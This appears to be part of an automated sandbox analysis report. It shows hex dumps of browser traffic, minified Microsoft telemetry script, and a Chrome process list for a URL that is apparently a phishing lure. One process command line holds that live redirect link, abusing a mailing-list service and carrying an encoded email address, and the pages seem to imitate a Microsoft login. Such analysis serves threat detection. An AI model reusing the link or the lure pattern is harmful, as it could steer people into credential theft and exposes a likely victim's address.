6f 72
                                      Data Ascii: MTString",at="toUTCString",ut="expires",ct=null,st=null,lt=null,ft=De(),dt={},vt={};function pt(n,e){var t=mt._ckMgr||vt._ckMgr;return t||(t=mt._ckMgr=mt(n,e),vt._ckMgr=t),t}function gt(n){return!n||n.isEnabled()}function yt(n,e){return!!(e&&n&&Bn(n.ignor
                                      2024-03-22 14:24:16 UTC2INData Raw: 74 75
                                      Data Ascii: tu
                                      2024-03-22 14:24:16 UTC16383INData Raw: 72 6e 20 74 65 28 75 29 7d 28 6e 2c 65 2c 74 29 3b 69 7c 7c 28 69 3d 75 29 2c 61 26 26 61 2e 5f 73 65 74 4e 65 78 74 28 75 29 2c 61 3d 75 7d 7d 29 29 7d 72 65 74 75 72 6e 20 72 26 26 21 69 3f 6c 69 28 5b 72 5d 2c 65 2c 74 29 3a 69 7d 66 75 6e 63 74 69 6f 6e 20 66 69 28 29 7b 76 61 72 20 6e 3d 5b 5d 3b 72 65 74 75 72 6e 7b 61 64 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 6e 2e 70 75 73 68 28 65 29 7d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 57 6e 28 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 72 79 7b 6e 28 65 2c 74 29 7d 63 61 74 63 68 28 72 29 7b 72 74 28 65 2e 64 69 61 67 4c 6f 67 28 29 2c 32 2c 37 33 2c 22 55 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 20 63 61 6c 6c 69 6e 67 20 75 6e 6c 6f 61 64 20 68 61 6e 64 6c 65 72 20
                                      Data Ascii: rn te(u)}(n,e,t);i||(i=u),a&&a._setNext(u),a=u}}))}return r&&!i?li([r],e,t):i}function fi(){var n=[];return{add:function(e){e&&n.push(e)},run:function(e,t){Wn(n,(function(n){try{n(e,t)}catch(r){rt(e.diagLog(),2,73,"Unexpected error calling unload handler
                                      2024-03-22 14:24:16 UTC16383INData Raw: 32 5d 3d 72 2e 72 6f 6c 65 56 65 72 2c 74 29 2c 64 29 7d 2c 6e 2e 61 70 70 6c 79 41 49 54 72 61 63 65 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 3b 69 66 28 74 2e 65 6e 61 62 6c 65 41 70 70 6c 69 63 61 74 69 6f 6e 49 6e 73 69 67 68 74 73 54 72 61 63 65 29 7b 76 61 72 20 72 3d 70 28 29 3b 72 26 26 54 6f 28 32 2c 6e 2c 44 69 2c 28 28 65 3d 7b 7d 29 5b 30 5d 3d 72 2e 67 65 74 54 72 61 63 65 49 64 28 29 2c 65 5b 31 5d 3d 72 2e 67 65 74 4e 61 6d 65 28 29 2c 65 5b 32 5d 3d 72 2e 67 65 74 53 70 61 6e 49 64 28 29 2c 65 29 2c 21 31 29 7d 7d 2c 6e 2e 61 70 70 6c 79 44 69 73 74 72 69 62 75 74 65 64 54 72 61 63 65 43 6f 6e 74 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 65 2c 74 3d 70 28 29 3b 69 66 28 74 29 7b 76 61 72
                                      Data Ascii: 2]=r.roleVer,t),d)},n.applyAITraceContext=function(n){var e;if(t.enableApplicationInsightsTrace){var r=p();r&&To(2,n,Di,((e={})[0]=r.getTraceId(),e[1]=r.getName(),e[2]=r.getSpanId(),e),!1)}},n.applyDistributedTraceContext=function(n){var e,t=p();if(t){var
                                      2024-03-22 14:24:16 UTC16383INData Raw: 69 7a 65 45 78 63 65 65 64 3a 5b 5d 2c 66 61 69 6c 65 64 45 76 74 73 3a 5b 5d 2c 62 61 74 63 68 65 73 3a 5b 5d 2c 6e 75 6d 45 76 65 6e 74 73 3a 30 2c 72 65 74 72 79 43 6e 74 3a 6e 2c 69 73 54 65 61 72 64 6f 77 6e 3a 65 2c 69 73 53 79 6e 63 3a 74 2c 69 73 42 65 61 63 6f 6e 3a 72 2c 73 65 6e 64 54 79 70 65 3a 6f 2c 73 65 6e 64 52 65 61 73 6f 6e 3a 69 7d 7d 2c 6e 2e 61 70 70 65 6e 64 50 61 79 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 69 29 7b 76 61 72 20 6f 3d 74 26 26 72 26 26 21 74 2e 6f 76 65 72 66 6c 6f 77 3b 72 65 74 75 72 6e 20 6f 26 26 47 72 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 53 65 72 69 61 6c 69 7a 65 72 3a 61 70 70 65 6e 64 50 61 79 6c 6f 61 64 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76
                                      Data Ascii: izeExceed:[],failedEvts:[],batches:[],numEvents:0,retryCnt:n,isTeardown:e,isSync:t,isBeacon:r,sendType:o,sendReason:i}},n.appendPayload=function(t,r,i){var o=t&&r&&!t.overflow;return o&&Gr(e,(function(){return"Serializer:appendPayload"}),(function(){for(v
                                      2024-03-22 14:24:16 UTC8696INData Raw: 20 58 28 29 7b 28 62 3d 7b 7d 29 5b 6a 6f 5d 3d 5b 32 2c 31 2c 30 5d 2c 62 5b 57 6f 5d 3d 5b 36 2c 33 2c 30 5d 2c 62 5b 56 6f 5d 3d 5b 31 38 2c 39 2c 30 5d 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 74 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 3d 6b 3b 50 26 26 28 69 3d 4e 29 2c 57 6e 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 2e 63 6f 75 6e 74 28 29 3e 30 26 26 57 6e 28 65 2e 65 76 65 6e 74 73 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 28 65 2e 73 79 6e 63 26 26 28 65 2e 6c 61 74 65 6e 63 79 3d 34 2c 65 2e 73 79 6e 63 3d 21 31 29 2c 65 2e 73 65 6e 64 41 74 74 65 6d 70 74 3c 69 3f 28 7a 72 28 65 2c 6e 2e 69 64 65 6e 74 69 66 69 65 72 29 2c 41 28 65 2c 21 31 29 29 3a 72 2e 70 75 73 68 28 65 29 29 7d 29 29 7d 29 29 2c 72 2e 6c 65 6e
                                      Data Ascii: X(){(b={})[jo]=[2,1,0],b[Wo]=[6,3,0],b[Vo]=[18,9,0]}function G(e,t){var r=[],i=k;P&&(i=N),Wn(e,(function(e){e&&e.count()>0&&Wn(e.events(),(function(e){e&&(e.sync&&(e.latency=4,e.sync=!1),e.sendAttempt<i?(zr(e,n.identifier),A(e,!1)):r.push(e))}))})),r.len


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.449784192.229.211.1994433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:16 UTC630OUTGET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1
                                      Host: logincdn.msftauth.net
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://24karat.us/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:16 UTC737INHTTP/1.1 200 OK
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                      Age: 1362192
                                      Cache-Control: public, max-age=31536000
                                      Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                      Content-Type: image/svg+xml
                                      Date: Fri, 22 Mar 2024 14:24:16 GMT
                                      Etag: 0x8DB77257FFE6B4E
                                      Last-Modified: Tue, 27 Jun 2023 15:45:14 GMT
                                      Server: ECAcc (nya/7898)
                                      Vary: Accept-Encoding
                                      X-Cache: HIT
                                      x-ms-blob-type: BlockBlob
                                      x-ms-lease-status: unlocked
                                      x-ms-request-id: 7e420b1b-e01e-0001-5601-707124000000
                                      x-ms-version: 2009-09-19
                                      Content-Length: 3651
                                      Connection: close
                                      2024-03-22 14:24:16 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.449785192.229.211.1994433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:17 UTC400OUTGET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1
                                      Host: logincdn.msftauth.net
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:17 UTC737INHTTP/1.1 200 OK
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                      Age: 1362193
                                      Cache-Control: public, max-age=31536000
                                      Content-MD5: nzaLxFgP7ZB3dfMcaybWzw==
                                      Content-Type: image/svg+xml
                                      Date: Fri, 22 Mar 2024 14:24:17 GMT
                                      Etag: 0x8DB77257FFE6B4E
                                      Last-Modified: Tue, 27 Jun 2023 15:45:14 GMT
                                      Server: ECAcc (nya/7898)
                                      Vary: Accept-Encoding
                                      X-Cache: HIT
                                      x-ms-blob-type: BlockBlob
                                      x-ms-lease-status: unlocked
                                      x-ms-request-id: 7e420b1b-e01e-0001-5601-707124000000
                                      x-ms-version: 2009-09-19
                                      Content-Length: 3651
                                      Connection: close
                                      2024-03-22 14:24:17 UTC3651INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30
                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0


                                      Click to jump to process

                                      Click to jump to process

                                      Click to jump to process

                                      Target ID:0
                                      Start time:11:23:33
                                      Start date:22/03/2024
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                      Imagebase:0x7ff76e190000
                                      File size:3'242'272 bytes
                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:2
                                      Start time:11:23:34
                                      Start date:22/03/2024
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=1988,i,4335926418607435208,2097072706423955988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                      Imagebase:0x7ff76e190000
                                      File size:3'242'272 bytes
                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:3
                                      Start time:11:23:37
                                      Start date:22/03/2024
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20="
                                      Imagebase:0x7ff76e190000
                                      File size:3'242'272 bytes
                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      No disassembly